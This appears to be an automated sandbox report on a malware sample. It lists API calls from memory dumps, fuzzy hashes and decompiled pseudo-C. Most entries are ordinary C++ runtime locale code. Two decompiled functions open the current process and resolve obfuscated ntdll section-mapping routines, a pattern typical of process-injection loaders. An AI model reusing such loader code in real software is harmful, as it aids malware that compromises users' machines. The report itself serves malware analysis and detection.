                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7BAD
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7BCD
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7BDA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F70D8
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F70E2
                                                                                                                                  • int.LIBCPMT ref: 6E8F70F9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F711C
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7133
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7153
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7160
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7043
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F704D
                                                                                                                                  • int.LIBCPMT ref: 6E8F7064
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F7087
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F709E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F70BE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F70CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7202
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F720C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7223
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F7246
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F725D
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F727D
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F728A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: 1f127ce60920df6713edb1541b961e929026db84eb92eb12b029d0ae222fcbec
                                                                                                                                  • Instruction ID: e247fed4c3f7dca50aa7dbcf80a409e2c6dd58ccca5fd89bf62d336557d77251
                                                                                                                                  • Opcode Fuzzy Hash: 1f127ce60920df6713edb1541b961e929026db84eb92eb12b029d0ae222fcbec
                                                                                                                                  • Instruction Fuzzy Hash: 3401C03190061ACFDF01DBE8C954AED777ABF953A8F104D09E4116B2C0EFB49A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F716D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7177
                                                                                                                                  • int.LIBCPMT ref: 6E8F718E
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F71B1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F71C8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F71E8
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F71F5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: 61883fc5aa5009a8ff41e77d5df48e72ef902dad1a2e25938c11b7e42595240e
                                                                                                                                  • Instruction ID: 66861b4c4daa53462445daf66dd568f8a41f57f35afe14351c776ccdc441471b
                                                                                                                                  • Opcode Fuzzy Hash: 61883fc5aa5009a8ff41e77d5df48e72ef902dad1a2e25938c11b7e42595240e
                                                                                                                                  • Instruction Fuzzy Hash: 30010031900619CBDF01DBE8C954AEDBBBAAF91398F114D09D4106B2C0DF709A4B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A1A24(intOrPtr _a4) {
                                                                                                                                  				void* _t2;
                                                                                                                                  				unsigned int _t4;
                                                                                                                                  				void* _t5;
                                                                                                                                  				long _t6;
                                                                                                                                  				void* _t7;
                                                                                                                                  				void* _t15;
                                                                                                                                  
                                                                                                                                  				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                  				 *0x31ad2a4 = _t2;
                                                                                                                                  				if(_t2 == 0) {
                                                                                                                                  					return GetLastError();
                                                                                                                                  				}
                                                                                                                                  				_t4 = GetVersion();
                                                                                                                                  				if(_t4 != 5) {
                                                                                                                                  					L4:
                                                                                                                                  					if(_t15 <= 0) {
                                                                                                                                  						_t5 = 0x32;
                                                                                                                                  						return _t5;
                                                                                                                                  					}
                                                                                                                                  					L5:
                                                                                                                                  					 *0x31ad294 = _t4;
                                                                                                                                  					_t6 = GetCurrentProcessId();
                                                                                                                                  					 *0x31ad290 = _t6;
                                                                                                                                  					 *0x31ad29c = _a4;
                                                                                                                                  					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                  					 *0x31ad28c = _t7;
                                                                                                                                  					if(_t7 == 0) {
                                                                                                                                  						 *0x31ad28c =  *0x31ad28c | 0xffffffff;
                                                                                                                                  					}
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				if(_t4 >> 8 > 0) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				_t15 = _t4 - _t4;
                                                                                                                                  				goto L4;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,031A2669,?,?,00000001,?,?,?,031A1900,?), ref: 031A1A2C
                                                                                                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,031A1900,?), ref: 031A1A3B
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,031A1900,?), ref: 031A1A57
                                                                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,031A1900,?), ref: 031A1A74
                                                                                                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,031A1900,?), ref: 031A1A93
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2270775618-3251738875
                                                                                                                                  • Opcode ID: 6318a97415918d3b52769ab963c6800876c4bb589b006922f15336bbb9d71cad
                                                                                                                                  • Instruction ID: 0aba412c66ea410d15c4c1e6c68b79bb20febc548d4d2ae4d6199b89da053e2d
                                                                                                                                  • Opcode Fuzzy Hash: 6318a97415918d3b52769ab963c6800876c4bb589b006922f15336bbb9d71cad
                                                                                                                                  • Instruction Fuzzy Hash: 0DF08C7C640F42BBD728EB38AA2A7293BA6A74C753F08552AE506C61C8D770C0C1DF75
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 031A1AF6
                                                                                                                                  • SysAllocString.OLEAUT32(0070006F), ref: 031A1B0A
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 031A1B1C
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A1B84
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A1B93
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A1B9E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  • Opcode ID: 0193de701557b828dfbf1e896923c14b56456d70c1b2f5dd39aa42f173b80389
                                                                                                                                  • Instruction ID: 6cece0be817b3708be6db19f2e224a999a83a5be92d9c03674c28058d5368bc0
                                                                                                                                  • Opcode Fuzzy Hash: 0193de701557b828dfbf1e896923c14b56456d70c1b2f5dd39aa42f173b80389
                                                                                                                                  • Instruction Fuzzy Hash: C341503A900A09AFDB01EFBCD944AEEB7B9AF4D312F144466E914EB110DB719905CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A4837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _t23;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				_Unknown_base(*)()* _t28;
                                                                                                                                  				intOrPtr _t30;
                                                                                                                                  				_Unknown_base(*)()* _t32;
                                                                                                                                  				intOrPtr _t33;
                                                                                                                                  				_Unknown_base(*)()* _t35;
                                                                                                                                  				intOrPtr _t36;
                                                                                                                                  				_Unknown_base(*)()* _t38;
                                                                                                                                  				intOrPtr _t39;
                                                                                                                                  				_Unknown_base(*)()* _t41;
                                                                                                                                  				intOrPtr _t44;
                                                                                                                                  				struct HINSTANCE__* _t48;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  
                                                                                                                                  				_t54 = E031A75F6(0x20);
                                                                                                                                  				if(_t54 == 0) {
                                                                                                                                  					_v8 = 8;
                                                                                                                                  				} else {
                                                                                                                                  					_t23 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t1 = _t23 + 0x31ae11a; // 0x4c44544e
                                                                                                                                  					_t48 = GetModuleHandleA(_t1);
                                                                                                                                  					_t26 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t2 = _t26 + 0x31ae782; // 0x7243775a
                                                                                                                                  					_v8 = 0x7f;
                                                                                                                                  					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                  					 *(_t54 + 0xc) = _t28;
                                                                                                                                  					if(_t28 == 0) {
                                                                                                                                  						L8:
                                                                                                                                  						E031A4AAB(_t54);
                                                                                                                                  					} else {
                                                                                                                                  						_t30 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  						_t5 = _t30 + 0x31ae76f; // 0x614d775a
                                                                                                                                  						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                  						 *(_t54 + 0x10) = _t32;
                                                                                                                                  						if(_t32 == 0) {
                                                                                                                                  							goto L8;
                                                                                                                                  						} else {
                                                                                                                                  							_t33 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  							_t7 = _t33 + 0x31ae4ce; // 0x6e55775a
                                                                                                                                  							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                  							 *(_t54 + 0x14) = _t35;
                                                                                                                                  							if(_t35 == 0) {
                                                                                                                                  								goto L8;
                                                                                                                                  							} else {
                                                                                                                                  								_t36 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  								_t9 = _t36 + 0x31ae406; // 0x4e6c7452
                                                                                                                                  								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                  								 *(_t54 + 0x18) = _t38;
                                                                                                                                  								if(_t38 == 0) {
                                                                                                                                  									goto L8;
                                                                                                                                  								} else {
                                                                                                                                  									_t39 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  									_t11 = _t39 + 0x31ae792; // 0x6c43775a
                                                                                                                                  									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                  									 *(_t54 + 0x1c) = _t41;
                                                                                                                                  									if(_t41 == 0) {
                                                                                                                                  										goto L8;
                                                                                                                                  									} else {
                                                                                                                                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                  										_t44 = E031A9269(_t54, _a8);
                                                                                                                                  										_v8 = _t44;
                                                                                                                                  										if(_t44 != 0) {
                                                                                                                                  											goto L8;
                                                                                                                                  										} else {
                                                                                                                                  											 *_a12 = _t54;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  			}



















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,031A101C,?,00000001,?,?,00000000,00000000), ref: 031A485C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 031A487E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 031A4894
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 031A48AA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 031A48C0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 031A48D6
                                                                                                                                    • Part of subcall function 031A9269: memset.NTDLL ref: 031A92E8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1886625739-0
                                                                                                                                  • Opcode ID: 23f4330191f0a4eabcc08b597e9937388a34e2c997e95cc121dda885cafb3aa5
                                                                                                                                  • Instruction ID: 0c3879f71fe24136690b95484ad1cbd5de0443c4e93a58936c53fe19cb870791
                                                                                                                                  • Opcode Fuzzy Hash: 23f4330191f0a4eabcc08b597e9937388a34e2c997e95cc121dda885cafb3aa5
                                                                                                                                  • Instruction Fuzzy Hash: 55212AB9504E0AAFDB10EF6ED944D6ABBECEF4C2527154026E545C7201DBB4E905CBB0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6E8FE172
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1DB
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1ED
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE205
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE215
                                                                                                                                  • _Getvals.LIBCPMT ref: 6E8FE237
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68BB
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3549167292-0
                                                                                                                                  • Opcode ID: 8600820448067cb0dd03198f472609bb8880dff0a8404b35a4a2e98b30a60a6a
                                                                                                                                  • Instruction ID: feea8bc94a24eab6035c6be7887af6534faf9f5e9c750b764e7b2cb37d91e825
                                                                                                                                  • Opcode Fuzzy Hash: 8600820448067cb0dd03198f472609bb8880dff0a8404b35a4a2e98b30a60a6a
                                                                                                                                  • Instruction Fuzzy Hash: 62216D71C00318EBDF149FE9D844ACE7BACAF04394F00895AB9149F281EB70D641CBE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F74EB
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F74F5
                                                                                                                                  • int.LIBCPMT ref: 6E8F750C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7546
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7566
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7573
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 25fad046ceb2f7b5a008cadd37196c78755ddaeeb5d3a4833d2a29d63f13869d
                                                                                                                                  • Instruction ID: 34f9cb2eb7e1a53f49ae4d7b180456944fb66bd3ca719060b5c60e0a9faa813f
                                                                                                                                  • Opcode Fuzzy Hash: 25fad046ceb2f7b5a008cadd37196c78755ddaeeb5d3a4833d2a29d63f13869d
                                                                                                                                  • Instruction Fuzzy Hash: D701AD31900619DBCF01DFE8C9946ED77BABF893A8F104D09D4106B2D0DB749A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C08
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1C12
                                                                                                                                  • int.LIBCPMT ref: 6E8F1C29
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1C63
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1C83
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1C90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 5a6457df432cc98f853bdf4401d9c4f0d01b87e6d92241c7b93ab68ebec466c9
                                                                                                                                  • Instruction ID: 687f0951bfd0439b76c408f6957bb9d76060093753be17834022809df6ba4f4d
                                                                                                                                  • Opcode Fuzzy Hash: 5a6457df432cc98f853bdf4401d9c4f0d01b87e6d92241c7b93ab68ebec466c9
                                                                                                                                  • Instruction Fuzzy Hash: 3001C071900629DBCF01DBE8C9946EE7BBAAF953A8F214D09D4106B2D0DF74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905434
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90543E
                                                                                                                                  • int.LIBCPMT ref: 6E905455
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90548F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9054AF
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9054BC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7456
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7460
                                                                                                                                  • int.LIBCPMT ref: 6E8F7477
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F74B1
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F74D1
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F74DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7C7C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7C86
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C9D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7CD7
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7CF7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D04
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9055F3
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9055FD
                                                                                                                                  • int.LIBCPMT ref: 6E905614
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90564E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90566E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E90567B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7D11
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7D1B
                                                                                                                                  • int.LIBCPMT ref: 6E8F7D32
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7D6C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7D8C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7580
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F758A
                                                                                                                                  • int.LIBCPMT ref: 6E8F75A1
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
